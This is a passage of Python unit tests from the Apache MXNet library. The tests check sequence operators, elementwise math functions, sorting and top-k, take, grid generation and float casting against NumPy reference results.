shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
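# The three helpers above are numpy references for SequenceLast / SequenceMask /
# SequenceReverse. Each first moves the sequence axis to position 1 so the data is
# [batch, seqlen, ...]; e.g. masking [[1, 2, 3], [4, 5, 6]] (axis=1, rows being the
# batch) with lengths [1, 2] and value 0 yields [[1, 0, 0], [4, 5, 0]].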
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
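# mathematical_core / mathematical_core_binary check a unary or binary op against
# its numpy forward and its analytic derivative: after comparing the forward pass,
# the backward pass is expected to produce out_grad * f'(x) (and, in the binary
# case, out_grad * df/dx and out_grad * df/dy evaluated at the fixed init points).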
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
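    # gt_topk above builds the NumPy ground truth for the sort/topk/argsort checks:
    # "indices" and "value" slice the (arg)sorted array along `axis`, while "mask"
    # marks the selected top-k positions with ones.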
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
                                                     is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
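    # grad_helper accumulates 1.0 into the slice of grad_in selected by `idx` along
    # `axis`; applied over every sampled index it builds the expected take() gradient.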
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
        grad_out = np.ones(
            (data_shape[0:axis] if axis > 0 else ()) + idx_shape +
            (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()),
            dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
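        # Every element of sc is gathered exactly once via the nested take() calls
        # below, so after summing, the expected gradient of sc is a matrix of ones.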
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
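        # Ground-truth gradient: each affine grid point is A.dot([x_norm, y_norm, 1]),
        # so dL/dA is out_grad (2 x N) times the stacked normalized coordinates tmp.T (N x 3).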
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
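# get_cast_op_data emits values of the form (-1)**s * 2**e * (1 + m/2**11 + delta),
# i.e. points at and just around float16 rounding midpoints, swept over the float32
# exponent range, plus a trailing NaN.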
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
